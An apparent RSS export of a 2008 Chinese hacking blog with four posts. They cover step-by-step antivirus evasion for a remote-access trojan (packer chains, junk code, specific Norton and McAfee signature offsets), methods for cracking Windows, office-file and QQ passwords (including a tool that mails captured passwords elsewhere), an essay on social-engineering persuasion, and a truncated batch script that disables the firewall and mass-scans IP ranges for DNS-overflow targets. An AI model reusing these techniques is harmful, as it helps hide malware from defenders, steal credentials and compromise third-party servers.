修改<br>杀毒软件扫描工具程序安装成功<br>\Program Files\Internet Explorer\IEXPLORE.EXE 修改<br>\windows\system32\smssrs.exemmmmmmmmmmmmmmmmm<br>最后mmmmmmmmmmmmmmmmm用00填充..<br>2.Restorator.exe 工具修改<br>3.ASProtect1.aspr2 保护下 <br>4.随便找个鸽子的加花工具 加段花指令<br>5.免疫007 .exe 免疫下<br>6.随便找个压缩加壳的工具 处理下给他减下肥....<br><br>--------------------------------------------------------------------------------<br>要用到的工具<br>1：aspack212<br>2：MaskPE 2.0最终版<br>3：prot765<br>4：北斗4.1破解版<br>用法：1。先用MASKPE2.0给服务端加密<br>2.用PROT765给服务端加壳<br>3.再用ASPACK212给服务端加壳<br>4.最后用北斗4.1再加一遍壳<br><br>--------------------------------------------------------------------------------<br><br>1.加壳(单客,多重壳)<br>2.大小写替换.<br>3.顺序替换.<br>4.加花(手工,软件)<br>5.修改入口点,打乱文件头<br>6.特征码修改(推荐)<br>7.删除多余代码(不能乱删) <br>--------------------------------------------------------------------------------<br>个人免杀经验心得<br>方法如下:<br>过卡巴和江民,加花指令 就过<br>过瑞星 修改压缩壳就过表面 但是内存还是要用007 或者是用MaskPE过内存<br>过麦咖啡 就用壳中加花法 就可以过!(不会就去网上找资料)<br>过金山 表面比较容易 但是金山数据流 麻烦..(下次公布方法)<br>过专杀,,方法就是:改安装路径 修改插入进程名,不要勾选隐藏进程<br>过世界反毒网,,方法比较容易, 就是反复的加壳加区加花 过加几次 就过了一大堆世界杀毒软件 <br>--------------------------------------------------------------------------------<br>1.压缩[UPX、ASPACK、PECompact、NSPACK、UPACK、expressor等]<br>2.加密[TELOCK、ASProtect、ACProtect、Morphine、PEspin等]<br>3.修改特征码[自动、手动]<br>4.修改入口点法[加区段、修改入口点]<br>5.花指令[和4差不多，只是稍加点技术]<br>对付国内的以上5种都有效！<br>对付内存监控可以用2、3等方法！<br>对付国外的2、3、4+5有效！<br>解释一下，为什么以前的加壳工具对卡巴都没效？<br>卡巴斯基具有极强脱壳引擎，对以知的加壳、加密软件都就有脱壳作用！<br>你用被杀壳的软件加了N层壳，结果对卡巴来说等于没加壳！<br>免杀难点——免卡巴：<br>1.用最新的压缩、加密软件是免杀卡巴最简单的方法！但是不能坚持多久就会被杀！<br>2.同时使用免杀手段的3+4+5再压缩，自己用的个人版软件几乎永远不被杀<br>--------------------------------------------------------------------------------<br>改特征的经验诺顿、麦咖啡特征码位置：<br>诺顿的： 起始偏移 000B9A4D 偏移大小 00000007<br>麦咖啡： 只要修改000B28B8处就可完成免杀<br>先生成一个服务端，接下来用C32ASM打开（用16进制），按Ctrl+G跳到000B9A4D，我们看到了一大段的字符串，这些应该是程序控件名及属性的定义，修改大小写后并不会影响程序的正常执行。选中包含000B9A4D_000B9A54在内的一段，点右键，选择“修改数据”，选择“大小写反转”，最后保存文件，再用诺顿8.0企业版（病毒库都已经更新今天）查杀，通过，测试上线成功。<br>PS：从网上的资料来看，诺顿的特征码基本上是定位在字符串上，一般修改大小写就可完成免杀。<br>接下来在刚才修改免杀的基础上，我们再来修改麦咖啡的特征码。<br>用OC计算文件偏移000B28B8处的内存地址为004B9CB8，用OD加载鸽子服务端，按Ctrl+G跳转到004B9CB8处，看看该处的内容<br>004B9CB8 4E dec esi<br>这里是减法运算，我们来看看它附近的汇编代码。<br>004B9CB0 4E dec esi<br>004B9CB1 0049 00 add byte ptr ds:[ecx],cl<br>004B9CB4 43 inc ebx<br>004B9CB5 004F 00 add byte ptr ds:[edi],cl<br>004B9CB8 4E dec esi<br>004B9CB9 0000 add byte ptr ds:[eax],al<br>各个寄存器相互并不影响，也不存在堆栈和出栈操作，我们要做的是改变004B9CB8处的汇编代码，这样也就改变了特征码，最简单的方法就是将004B9CB8处的代码写到程序后面的0区域，然后用JMP指令来完成跳转。不过这里不需要这么做，如果将004B9CB5和004B9CB8处的代码交换一下，改成如下的形式<br>004B9CB5 4E dec esi<br>004B9CB8 004F 00 add byte ptr ds:[edi],cl<br>很明显原来004B9CB8处的代码换成了004B9CB5处的，而004B9CB5处的则换成了004B9CB8处的代码，交换顺序后，保存文件。用麦咖啡查杀已经通过，测试上线成功。<br>最后就是用Resource Hacker等资源编辑工具删除hacker资源，将修改后的服务端文件命名为CServer.dat覆盖到鸽子的Cache目录下。 <br>--------------------------------------------------------------------------------<br>免杀经验:<br>1.加区,加花后,再加密,可以比较容易过卡巴----如加密工具vmprotect<br>脱壳过的木马---加花指令,或加区加花---加密---加压缩壳---再加区加花指令<br>2.单单加免杀花指令已经不能过卡巴,一定要配合加免花后在加压缩壳,才能起到免杀卡巴的效果.<br>vmprotect加密----再加花-----可过卡巴:<br>3.加双层花指令免杀法----免卡巴<br>4.加密---007内存免----加压 ---免卡巴或内存.<br>5.双层加密(maskpE)---加压 ----可过卡巴.<br>6.maskpe加密---asppack加壳 ---改入口点加1---可过卡巴<br>7.加密maskpe----加花或加区加花(用工具)-----加压缩壳---免卡巴<br>8.北斗对黑防鸽子可加压二次,再压其它压缩壳.以达免杀.<br>9.加过北斗壳,上向拉滚开鼠标50多次,有一段空代码,可以加花,转移.<br>10.去头转移入口点---加花----加密(vmprotect) ----加压缩==过所有杀毒<br>11.对付卡巴,加免杀花指令.花指令对瑞星表面查杀一般无效,一般加压缩壳.<br>12.对付瑞星表面: 有些黑软,加区,加花后被瑞星表面杀,可以这样:先加压过瑞星表面,然后加免杀花指令,过卡巴.<br>13.过瑞星表面的查杀方法:<br>a.加北斗内存免杀压缩壳<br>b.加过瑞星表面的专用加密工具.<br>c.用maskPE加密工具加密.PS:用了PEditor本来不杀的马却被杀，不过删掉xx汉化，咔吧不杀了. <!--v:3.2--> ]]></description>
<category><![CDATA[免杀技术]]></category>
<author><![CDATA[214567620@qq.com(L. xin)]]></author>
<comments>http://214567620.qzone.qq.com/blog/1218675048#comment</comments>
<qz:effect>512</qz:effect>
<pubDate>Thu, 14 Aug 2008 00:50:48 GMT</pubDate>
<guid>http://214567620.qzone.qq.com/blog/1218675048</guid>
</item>

<item>
<title><![CDATA[破解常用电脑密码实用技巧]]></title>
<link>http://214567620.qzone.qq.com/blog/1218674791</link>
<description><![CDATA[一、CMOS密码破解 <br>　　使用电脑，首先需要开机。因此开机密码是我们最先要遇到的。虽然CMOS种类各异，但它们的加密方法却基本一致。一般破解的方法主要从“硬”和“软”两个方面来进行。 <br>　　1.“硬”解除方法 <br>　　硬件方法解除CMOS密码原理是将主板上的CMOSRAM进行放电处理，使存储在CMOSRAM中的参数得不到正常的供电导致内容丢失，从而起到解除CMOS密码的目的。一些报刊对如何破解CMOS密码的通常做法，如跳线短接法和电池短接法已有较多介绍，操作起来也十分方便。但我们这里要介绍的是个另类技巧，这也是一些电脑DIY们很喜欢用的方法。方法也很简单：打开机箱，将硬盘或光驱、软驱的数据线从主板上拔掉，然后再启动计算机，BIOS会在自检时报告错误并自动进入CMOS，此时就可以重新设置BIOS内容了。 <br>　　2.“软”解除方法 <br>　　严格地说，“软”解除CMOS密码没有“硬”解除方法那么彻底，但也十分奏效。CMOS密码根据需要，可设为普通级用户密码和超级用户级密码两种。前者只是限制对BIOS的修改，可以正常启动电脑和运行各类软件，而后者则对进入电脑和BIOS完全禁止。 <br>　　1） 破解普通用户密码 <br>　　首先用DOS启动盘启动电脑，进入DOS状态，在DOS命令行输入debug回车，然后用所列的其中任何一种方法的数据解除CMOS密码，重新启动电脑，系统会告诉你CMOS参数丢失，要求你重新设定CMOS参数。经过试验，这是一种很有效的方法。“-”后面的字母“O”，表示数值输出的地址，70和10都是数值。 <br>　　2） 破解超级用户密码 <br>　　这里我们需借助外部工具。我们选用最为经典的BiosPwds，是一款免费软件，比较适合对DOS不太熟悉的电脑用户，很久以前就为人们所熟知，只要轻轻一点，就会将用户的CMOS密码显示出来。工具最新版本1.21，127KB，免费下载地址：http：//bj2.onlinedown.net/soft/8107.htm。下载解压后，双击该软件的执行文件，在出现的界面中点击“Getpasswords”按钮，稍等二、三秒即会将BIOS各项信息显示于BiosPwds的界面上，包括：Bios版本、Bios日期、使用密码等，这时你便可以很轻松地得知BIOS密码。<br>　　二、破解系统密码 <br>　　系统密码是你登录到操作系统时所使用到的密码，它为你的计算机提供了一种安全保护，可以使你的计算机免受非法用户的使用，从而保障电脑和机密数据的安全。 <br>　　1. Windows98/ME的系统登录密码 <br>　　① 取消法 <br>　　最简单的一种方法是在系统登录要求输入密码时，你什么也不用输入，直接点击取消，可以进入操作系统。但用此种方法只能访问本机的资源，如果计算机是局域网的一部分，你将不能访问网络资源。 <br>　　② 新增使用者 <br>　　当你由于密码问题被挡在系统之外时，不妨为系统再新增一个使用者，然后重新登录，一样可以登录系统并访问系统或网络资源。单击“开始”/“设置”/“控制面板”，然后双击“用户”，打开“用户属性”对话框。接着，根据提示依次输入“用户名”、“密码”、“个性化项目设置”中所需的内容，最后单击“完成”。 <br>　　③ 删除&quot;PWL&quot;文件 <br>　　删除Windows安装目录下的.PWL密码文件和Profiles子目录下的所有个人信息文件，然后重新启动Windows，系统就会弹出一个不包含任何用户名的密码设置框，我们无需输入任何内容，直接点击&quot;确定&quot;按钮，Windows密码即被删除。 <br>　　④ 修改注册表 <br>　　运行注册表编辑器，打开注册表数据库&quot;HKEY＿LOCAL＿MACHINE＼Network＼Logon&quot;分支下的&quot;username&quot;修改为&quot;0&quot;，然后重新启动系统，也可达到去掉密码的目的。 <br>　　2. 破解WindowsNT密码 <br>　　如果你有普通用户账号，有一个很简单的方法获取NTAdministrator账号：先把c：＼winntsystem32下的logon.scr改名为logon.old备份，然后把usrmgr.exe改名为logon.scr再重新启动。logon.scr是系统启动时加载的程序，重新启动后，不会出现以往的登录密码输入界面，而是用户管理器，这时你就有权限把自己加到Administrator组。 <br>　　3. Windows2000密码 <br>　　启动盘启动电脑或引导进入另一操作系统（如Windows98），找到文件夹&quot;X：＼DocumentsandSettings＼Administrator&quot;（X为Windows2000所在磁盘的盘符），将此文件夹下的&quot;Cookies&quot;文件夹删除，然后重新启动电脑，即可以空密码快速登录Windows2000。 <br>　　4. 破解WindowsXP的密码 <br>　　在启动WindowsXP时按F8键选择带命令行的安全模式，使用net命令可以对用户身份进行操作。具体步骤如下：使用命令&quot;netuserabcd/add&quot;添加一名为abcd的用户，使用命令&quot;netlocalgroupadministratorsabcd/add&quot;将用户abcd提升为管理员，重新启动电脑，用abcd身份登录，最后对遗忘密码的用户进行密码修改即可。<br>　　网管员在维护和使用电脑时，经常会遇到各种密码丢失的问题，这里，我们就为广大网管员准备了一些破解密码的方法，但是希望大家不要干坏事哦。<br>　　三、破解几个常用软件密码 <br>　　目前，更多的用户懂得了利用电脑软件对自己的一些储存在电脑中的信息进行加密操作，使无权阅读的人无法轻松打开这些重要资料。下面就让我们一块看一下几个常用软件密码的解除： <br>　　1. 破解WPS系列密码 <br>　　如果你是合法用户，在忘却密码时，启动WPS程序，点击“文件”/“密码设置”菜单，在出现的密码设置对话框中可以看到原密码会自动以“”号的方式出现在“密码”文本框中，点击“清除”按钮，再在随后出现的提示框中点击“确认”按钮，该加密文件的密码已经被清除了。以后再次打开该文件就不再需要输入密码了。如果你不是合法用户就只能借助有关工具进行破解。现在破解WPS密码的软件很多，但论其功能强大，破解速度快就要数国产的Edward＇sWPS2000PasswordRecovery了。该工具破解WPS密码采用的是破解密码的常见的方法———穷举法。使用步骤如下：首先，在程序界面中的“EncryptedWPS2000file”的文本框中通过右侧的“浏览”按钮加入需破解的WPS加密文件；然后选择密码破解方法，该软件有以下几种密码破解方式：Brute-force（强力攻击）、Dictionary（字典攻击）、mask（掩码搜索）等等，一般选用“Brute-force”（强力破解）法；接着在“Brute—forceRangeOptions”列表框中选择破解密码可能包含的密码范围，例如：大小写字母、数字、是否有空格、特殊字符等；此外还要指定密码长度，如6位或更长；最后，当上述几项设置完毕后，请点击&quot;RUN&quot;选项，密码很快得以破解。 <br>　　2. 破解Word文档密码 <br>　　可能是微软的Office太引人注目了，针对它的破解软件非常多。下面先让我们来看看如何破解它的文档密码。我们选用一款国产的软件“97/2000/XP密码查看器”，这是一款仅有29KB大小的微型简体中文的Word密码解除软件。此软件无需安装，双击可执行文件即可。该工具可以破解Win dows9X/NT/2000/XP全系列的文档密码，可以查找最多13位的密码（未注册版只支持3位），使用“字典式”穷举法破解。使用时在程序中点击“文件”/“打开”命令加入需破解文档；在“任务属性”中设置密码类型，建议将几个选项全部选中；填写密码长度；点击“确定”返回主界面，选择&quot;操作&quot;/&quot;开始破解命令即可进行密码破解。 <br>　　3. 破解Excel文档 <br>　　我们选用一个叫AdvancedExcel97PasswordRecovery的工具，614K，最近版本1.01，它可以迅速破解Excel文件的密码。AdvancedExcel97PasswordRecovery下载后需要安装，安装完毕后打开其程序主界面，通过浏览按钮打开需要解密的电子表格文档，选择密码长度，设置密码类型，最后点击蓝色的开始破解按钮，稍等片刻会弹出文档密码已被破解的提示菜单。 <br>　　4.破解QQ密码 <br>　　我们使用一个叫“OICQ密码终结者”的工具。使用步骤如下：首先要设置你的OICQ的安装目录；接着选择搜索用的字符集，例如选上图中小写字母的字符集，就选中小写字母前的复选框或将&quot;基本设置&quot;下面的所有方框全部选中；然后设置搜索密码的位数，建议不要太长，例如8位，那就需要很长时间，不知你有没有耐心；最后单击&quot;开始&quot;按钮即可进行OICQ的密码破解。据网上高手称Oicqpassovcr的穷举速度可以达到每秒钟数千次，如果你想破解的QQ密码只是4-5位的话，我想在几分钟之内Oicqpassover就可以破解密码了。<br>　　四、破解网络密码 <br>　　网络正悄然而迅速地走进我们的日常生活。但作为普通的网络用户，人们都有一种共同的忧虑，就是网络的安全隐患。于是不得不对个人网络活动采取有效的保护措施——加上各种密码。但这些密码一旦遗忘，成为我们进行工作的大碍。下面是一些有关网络密码的破解技巧。 <br>　　1. 破解上网账号与密码 <br>　　作为日常上网的桥梁，我们每个人都需要在上网时进行上网账号与密码的设置，这样才能登录网络。利用一些工具软件获得账号并不是很难的事情，甚至可以说是一件轻而易举的事情。这里我们借助一个叫GetIP的工具，这是个由国人刘骥设计开发的“口令密码”识别软件。GetIP能够帮助我们将那些代表口令的密码“***”号还原成真实的口令。如果你需要该软件，可到作者的主页http：//brain.zb169.net/免费下载。GetIP使用十分简单，运行GetIP.exe可执行文件，出现程序界面，将鼠标指向“点击（放大镜）处并拖动”，用鼠标拖着移动到想要得知的密码处，真实的密码口令就会立即反应到&quot;文本&quot;框中。 <br>　　2. 破解IE分级审查密码 <br>　　IE浏览器提供了分级审查功能，它可以在用户的设置下对某些网页进行过滤，只有知道分级审查功能密码的用户才能查看相关网页的信息。如果遗忘了分级审查功能的密码，不但不能访问受到限制的站点，而且不能更改已有的限制级别，重装IE也没有用，怎么办？启动注册表编辑器，找到“HKEY＿LOCAL＿MACHINE＼SOFTWARE＼Microsoft＼Windows＼CurrentVersion＼policies＼Ratings”子键，找到一个名叫&quot;KEY&quot;的键值项，它就是用户设置IE分级审查口令（数据已经加密），用户只需删除该键值就可以取消分级审查口令，然后重新设置IE分级审查密码即可。 <br>　　3. 破解OE密码 <br>　　在OE程序中有三种密码：邮箱密码、新闻组密码和用户身份确认密码。下面我们以一个叫“密码截取”（3.1特别版）的软件，可运行于WIN9X/2000/NT/XP，110KB，可到http：//gaoasp.diy.163.com/处下载。软件可以用于破解Web的邮箱密码、POP3收信密码、FTP登录密码，并将密码显示、保存，或发送到用户指定的邮箱。密码截取过程：密码截取软件将截取到的密码输入框中的密码（如拨号连接、OICQ、IE中的密码），以密码明文形式保存在用户自定义的文件中（缺省为c：＼password.txt），如果没有截取到密码，密码文件将不存在。同时可以将获取到的密码发送到用户指定的邮箱中。密码截取2.8支持的操作系统：Windows9X/NT/2000。该软件不需安装，下载并解压后，直接双击getpassword.exe运行，点击图中的&quot;邮件设置&quot;选项，设置将截取到的密码发向指定信箱，接着点击&quot;密码文件&quot;选项，设置将截取到的密码保存在本机的c：＼password.txt中，以便随时查看。 <br>　　4. 破解Foxmail密码 <br>　　有相当多的用户，使用简单却功能强大Foxmail做邮件接收工具。但是由于Foxmail本身的安全隐患，一些人只须新建一个账户后，进入Foxmail缺省的安装目录下，将新建的账户目录下的“account.stg”文件复制后将你的账户文件覆盖，你所建立的账户密码就会被清除。<br><br> <!--v:3.2--> ]]></description>
<category><![CDATA[破解技术]]></category>
<author><![CDATA[214567620@qq.com(L. xin)]]></author>
<comments>http://214567620.qzone.qq.com/blog/1218674791#comment</comments>
<qz:effect>576</qz:effect>
<pubDate>Thu, 14 Aug 2008 00:46:31 GMT</pubDate>
<guid>http://214567620.qzone.qq.com/blog/1218674791</guid>
</item>

<item>
<title><![CDATA[什么是社会工程学？]]></title>
<link>http://214567620.qzone.qq.com/blog/1215329105</link>
<description><![CDATA[        总体上来说，社会工程学就是使人们顺从你的意愿、满足你的欲望的一门艺术与学问。它并不单纯是一种控制意志的途径，但它不能帮助你掌握人们在非正常意识以外的行为，且学习与运用这门学问一点也不容易。<br>　　它同样也蕴涵了各式各样的灵活的构思与变化着的因素。无论任何时候，在需要套取到所需要的信息之前，社会工程学的实施者都必须：掌握大量的相关知识基础、花时间去从事资料的收集与进行必要的如交谈性质的沟通行为。与以往的的入侵行为相类似，社会工程学在实施以前都是要完成很多相关的准备工作的，这些工作甚至要比其本身还要更为繁重。<br>　　你也许会认为我们现在的论点只是集中在证明“怎样利用这种技术也能进行入侵行为”的一个突破口上。好了，其实这样够公平的了。无论怎么说，“知道这些方法是如何运用的”也是唯一能防范和抵御这类型的入侵攻击的手段了。从这些技术中提取而得出的知识可以帮助你或者你的机构预防这类型的攻击。在出现社会工程学攻击这类型攻击的情况下，像CERT发放的、略带少量相关信息的警告是毫无意义的。它们通常都将简单地归结于：“有的人通过‘假装某些东西是真的’的方式去尝试访问你的系统。不要让他们得逞。”然而，这样的现象却常有发生。<br>　　那又如何呢？<br>　　社会工程学定位在计算机信息安全工作链路的一个最脆弱的环节上。我们经常讲：最安全的计算机就是已经拔去了插头（注释：网络接口）的那一台（注释：“物理隔离”）。真实上，你可以去说服某人（注释：使用者）把这台非正常工作状态下的、容易受到攻击的（注释：有漏洞的）机器接上插头（注释：连上网络）并启动（注释：提供日常的服务）。<br>　　也可以看出，“人”这个环节在整个安全体系中是非常重要的。这不像地球上的计算机系统，不依赖他人手动干预（注释：人有自己的主观思维）。由此意味着这一点信息安全的脆弱性是普遍存在的，它不会因为系统平台、软件、网络又或者是设备的年龄等因素不相同而有所差异。<br>　　无论是在物理上还是在虚拟的电子信息上，任何一个可以访问系统某个部分（注释：某种服务）的人都有可能构成潜在的安全风险与威胁。任何细微的信息都可能会被社会工程学使用者用着“补给资料”来运用，使其得到其它的信息。这意味着没有把“人”（注释：这里指的是使用者/管理人员等的参与者）这个因素放进企业安全管理策略中去的话将会构成一个很大的安全“裂缝”。<br>　　一个大问题？<br>　　安全专家常常会不经意地把安全的观念讲得非常的含糊，这样会导致信息安全上的不牢固性。在这样的情况下社会工程学就是导致不安全的根本之一了。我们不应该模糊人类使用计算机或者影响计算机系统运作这个事实，原因我在之前已经声明过了，地球上的计算机系统不可能没有“人”这个因素的。几乎每个人都有途径去尝试进行社会工程学“攻击”的，唯一的不同之处在于使用这些途径时的技巧高低而已。<br>　　方法<br>　　试图驱使某人遵循你的意愿去完成你想要完成的任务是可以有很多种方法的。第一种方法也是最简单明了的方法，就是目标个体被问到要完成你的目的时给予其一个直接的“指引”了。毫无疑问这是最容易成功的，也是最简单与最直观的方法了。当然，被指引的个体也会清楚地知道你想他们干些什么。<br>　　第二种就是为某个个体度身订造一个人为的（注释：通过捏造的手段）特定情形/环境。这种方法比你仅仅需要考虑到了某个个体的相关信息状况附带更多的因素，例如如何说服你的对象，你可以设定（注释：刻意安排）某个理由/动机去迫使其为你完成某个非其本身意愿的行为结果。这包括了远至于为某个特定的个体创造一个有说服力的企图而进行的工作，与大量你想得到的“目标”的相关知识。这意味着那些特定的情况/环境必须建立在客观事实的基础上。少量的谎言会使效果更好一些。<br>　　社会工程学中最精炼的手段之一就是针对现实事物的良好记忆能力。在这个问题上黑客与系统管理员会更为侧重一点，特别是在某种事物与他们的领域有所关联的情况下。为了说明上述的方法，我准备列举一个小型的范例.......<br>　　[范例如下，当你把某个个体“置于”群体/社会压力（注释：其类型如舆论压力等）下的处境/形势时，个体很有可能会做出符合群体决定的行为，尽管这个决定很明显是错误的。] <br><br>一致性<br>　　若在某些情况下有人坚信他们群体的决定是对的话，那么这将有可能导致他们做出不同于往常的判断/行为。比方说如果我曾发表过某个结论，论点的理由非常充分（注释：这里指的是符合群体中多数人的意愿），那么往后无论我花多大的精力去尝试说服他们，都不可能令他们再改变自己的决定了。<br>　　另外，一个群体是由不同位置/层次的成员组成的。这个位置/层次问题被心理学者称之为“demand charac-teristics”（注释：“意愿的特征性”），这个位置/层次问题在参与者的行为上受其浓厚的社会约束性所影响。不希望得罪其他的成员的、不想被其他人看出自己在会议中想睡觉的、不想破坏与自身关系良好的伙伴的观点等的心态最终都会成为“随波逐流”现象的形成因素。这种运用到特征的处理方式是引导人们行为的一种有效途径。<br>　　情形<br>　　无论怎么说，大多数的社会工程学行为都是被一些单独的个体所运用的，因此诸如社会压力与其它的一些影响因素都必须建立在和目标有一定的可信关系的情况下进行的。<br>　　如果处于这样的情形下，当有了真实或者虚构出来的固有特征时目标个体就很可能会遵循你的意愿而工作了。这些固有特征包括：<br>　　目标个体以外的压力问题。如让个体相信某个行为的后果并不是他一个人的责任。<br>　　借助机会去迎合某人。这些行为更多取决于此个体是否认为某个决定能为某人带来“好处”。这样的行为可以使你与老板的关系更为融洽。<br>　　道德上的责任。个体会遵从你是因为他们觉得自己（注释：在道德上）有义务这么做。这就是利用了内疚感。人们比较愿意逃避内疚感，因此如果有一个“可能”会让他们觉得有内疚感的话他们都会尽可能地去避免这个“可能”。<br>　　个人的说服力<br>　　个人的声望/说服能力是一种常被用于促使某人配合/顺从你的有利手段。使用个人说服力的目的并不是要别人强行接受你所指派的“任务”，而是增强他们对完成你所指派的任务的主动顺从意识。<br>　　其实这是有些矛盾的。基本上，目标只是被我们简单地引导到一个已经设置好的、特定的（注释：故意安排的）思维模式上去。目标会认为他们可以控制住局面，在此同时他们也通过他们的力量帮助了你。<br>　　事实上，目标所得到的利益与他间接帮助你得到的利益此两者是没有冲突的。社会工程学使用者的目的是说服目标，使其有充分的理由去相信只需花费小量的时间与精力就可以“换取”得到利益了。<br>　　合作<br>　　存在着多个因素可以促使一个社会工程学使用者增加与目标“合作”的机会。<br>　　尽量少与目标发生冲突。使用平和的态度去面对对方可以提高达成目的成功几率。拉拢关系或者发展新的关系，共同的烦恼又或者是一些比较特殊的任务都可以有效地迫使目标与你合作。<br>　　在这里‘走向成功’的因素往往集中在你是否有能力去掌握与处理好你的说服力。这是非常重要的，这一点常被“骗子”（注释：常常使用欺骗手段的人）认为是万试万灵的手段。心理学研究指出如果人们先前曾经遵照过某个极小的指引而工作（注释：并获得成功）时现在他/她就更可能会去遵照一个更大的（注释：指引）了。在这里如果曾有过合作的前科的话，那么这次再合作，达成的机会就很大了。<br>　　更好的方法是让社会工程学者给予合作对象一些比较敏感的信息。尤其是一些非常逼真的视听感观，目标能够现场看到或听到你给他们的信息要比他们仅仅可以通过电话听到你的声音更能令他们信服。这个观点一点也不稀奇，以书写形式或电子方式进行交流的信息是很难让人信服的。这就如同拒绝某人进行某个IRC风格的通信一样。 关联<br>　　不管怎么说，社会工程学运用是否能成功也有取决于目标个体与你的目的有多大关联的因素的。我们可以说系统管理员、计算机安全执行官、技术研究人员、那些依靠计算机/网络进行工作又或者通过其进行通信的人与大多数黑客使用社会工程学进行攻击的目标都是有莫大的关联的。<br>　　有高度关联性的个体大多会被强而有利的论据所说服。事实上你可以给予他们更多强而有利的论据来支持你的观点。当然，那些观点也有薄弱的一面。你是否将论点薄弱的一面展现给有高度关联的人知道将极大可能地决定你是否能说服此人。当某人有可能直接被社会工程学攻击所影响，若此时出现薄弱的论据将有可能会导致其思想上产生“相反”的意识。所以面对与你的目的有关联的人时你必须给予强而有力的论据，而避免出现理由薄弱的论据。<br>　　相对于对你的指引或你想得到的结果并不敢兴趣的人，你可以把他们列入“低关联的人”这个类别中去。相关的例子如：一个网络系统机构中的保安人员、清洁工人、又或者是前台接待小姐等。因为低关联类别的个体并不会直接对你的目的/结果造成影响，而且他们往往不会去分析你用来说服他们的论点的双面性问题。他们的决策往往会遵循你的意愿又或者是完全不受其它的“意识”所影响。这些的“意识”如：社会工程学所提供的理由、表面形势上的迫急性又或者是在某人强烈的说服下。凭经验而论，在这样的情况下我们只能尽可能地给予其更多的论据与理由了，估计这样的效果会更好一些。基本上，对于那些与你的意识不一致的人，试图用大量的论据和指引去说服他们更胜于他们与你的目的的关联程度。<br>　　有一点是需要注意的：在进行某些工作的时候，能力低的个体更多会去仿效能力高的个体的行为模式。在计算机系统管理方面，“能力低的个体”大多是指上文所提到的“低关联的人”。站在上述的观点上考虑，不要试图对系统管理员这类别的个体进行社会工程学攻击，除非其能力不及你，不过这样的可能性非常的低。<br>　　防御他人的攻击<br>　　综合上述的资料能否让读者更好地保障他们整个计算机系统的安全呢？其实踏出“美好的”第一步就是要视乎员工们能否在自己的工作岗位上保障自己的计算机系统的信息安全。这不但需要你无条件地增强他们的安全防范意识，而且你自身也必须具备更高的警惕性。打个比方，如果你让某人专门负责保护你的计算机系统安全的话，那么就有便利于那个人在没有正常许可的情况下访问你系统的可能了。<br>　　无论如何，对付与防御这类型攻击的最有效手段，也作为最常见的手段，就是“教育/培训”了。第一步是教育你的雇员与那些有可能被利用作为社会工程学实施目标的人关于计算机/信息安全的重要性。直接给予容易攻击的人们一些预先的警告已经足以让他们去辨认社会工程攻击了。不过要记着，在教育他们计算机信息安全的时候可以使用一些故事及其“双面性”来作为例子。这并不是我自己的个人喜好哦。当个体明白了这个焦点的“双面性”以后他们基本上就不会动摇他们所处的立场了。而且如果他们是专注于计算机安全技术的话，那么他们更有可能会站在维护你的数据安全的立场上。<br>　　也有不会遵从人们的说服力倾向而作出行动的思维因素的。在这里你必须有清晰的思维、高度的创造力、可以应付和处理压力的能力与适当的自信。压力的处理能力与自信可以通过后天培养。至于自身的主张和见解常常被用于对员工的管理方面，训练它可以减少某些个体被施行社会工程学攻击的机会，也有助于其他方面的工作。<br>　　了解各种使人们的信息安全意识降低与威胁你的安全策略的因素。其实这方面只需要投入小量的精力就可以在降低安全风险方面产生很大的成效了。<br>　　结论<br>　　与普遍的思想观念相反，运用社会工程学捕捉人们的心理状态的技巧要比入侵一个sendmail容易得多。但如果你想让你的员工去预防与检测社会工程学攻击的话，其效果绝对不会比你让他们去维护UNIX系统安全的效果明显。<br>　　站在系统管理员的立场上，不要让“人之间的关系”问题介入你的信息安全链路之中，以至于让你的努力前功尽弃。站在黑客的立场上呢，当系统管理员的“工作链”上存放有你所需要的数据时，千万不要让他“摆脱”自身的脆弱环节<br> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[214567620@qq.com(L. xin)]]></author>
<comments>http://214567620.qzone.qq.com/blog/1215329105#comment</comments>
<qz:effect>512</qz:effect>
<pubDate>Sun, 06 Jul 2008 07:25:05 GMT</pubDate>
<guid>http://214567620.qzone.qq.com/blog/1215329105</guid>
</item>

<item>
<title><![CDATA[DNS批量溢出批处理代码]]></title>
<link>http://214567620.qzone.qq.com/blog/1215328777</link>
<description><![CDATA[@shift 1 <br>@ setlocal <br>@ cls <br>@ color A <br>@ title DNS批量<a href="http://www.77169.com/Images/ucxogu/yichu/77169.htm" target="_blank">溢出</a><wbr />个人版 <br>@echo ================================================================================ <br>@echo DNS批量<a href="http://www.77169.com/Images/ucxogu/yichu/77169.htm" target="_blank">溢出</a><wbr />个人版 <br>@echo BY Loophole<br>@echo 1.输入您想<a href="http://www.77169.com/Images/ucxogu/yichu/77169.htm" target="_blank">溢出</a><wbr />的IP段 格式：XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX <br>@echo================================================================================= <br>@ set /p input=1.输入您想<a href="http://www.77169.com/Images/ucxogu/yichu/77169.htm" target="_blank">溢出</a><wbr />的IP段: <br>@ echo %input%&gt;&gt;ip.txt <br>@ net stop sharedaccess <br>@ net start server <br>@echo ================================================================================ <br>@set /p c=请选择扫描方式： (1为TCP，2为syn): <br>@if &quot;%c%&quot;==&quot;2&quot; goto syn <br>@if &quot;%c%&quot;==&quot;1&quot; goto tcp <br><br>:syn <br>@for /f &quot;eol= tokens=1,2 delims= &quot; %%i in (ip.txt) do %MYFILES%\s syn %%i %%j 53 /save <br>@ goto ip <br><br>:tcp <br>@for /f &quot;eol= tokens=1,2 delims= &quot; %%i in (ip.txt) do %MYFILES%\s tcp %%i %%j 53 1000 /save <br><br>@ goto ip <br><br>:ip <br>@for /f &quot;eol=- tokens=1 delims= &quot; %%i in (result.txt) do echo %%i&gt;&gt;s1.txt <br>@for /f &quot;eol=P tokens=1 delims= &quot; %%i in (s1.txt) do echo %%i&gt;&gt;s2.txt <br>@for /f &quot;eol=S tokens=1 delims= &quot; %%i in (s2.txt) do echo %%i&gt;&gt;s.txt <br><br>@del ip.txt <br>@del s1.txt <br>@del s2.txt <br>@del Result.txt <br>@echo================================================================================= <br>@echo 等待<a href="http://www.77169.com/Images/ucxogu/yichu/77169.htm" target="_blank">溢出</a><wbr />…………当出现类似203.80.19.6 1077 :Vulnerability OS:window 2003 <br>@echo 为可以<a href="http://www.77169.com/Images/ucxogu/yichu/77169.htm" target="_blank">溢出</a><wbr />的IP 203.80.19.6 为IP 1077为端口 2003 为系统类型 <br>@echo 请把能<a href="http://www.77169.com/Images/ucxogu/yichu/77169.htm" target="_blank">溢出</a><wbr />的保存为boot.txt 保存格式：IP 端口 系统 例如 58.34.125.200 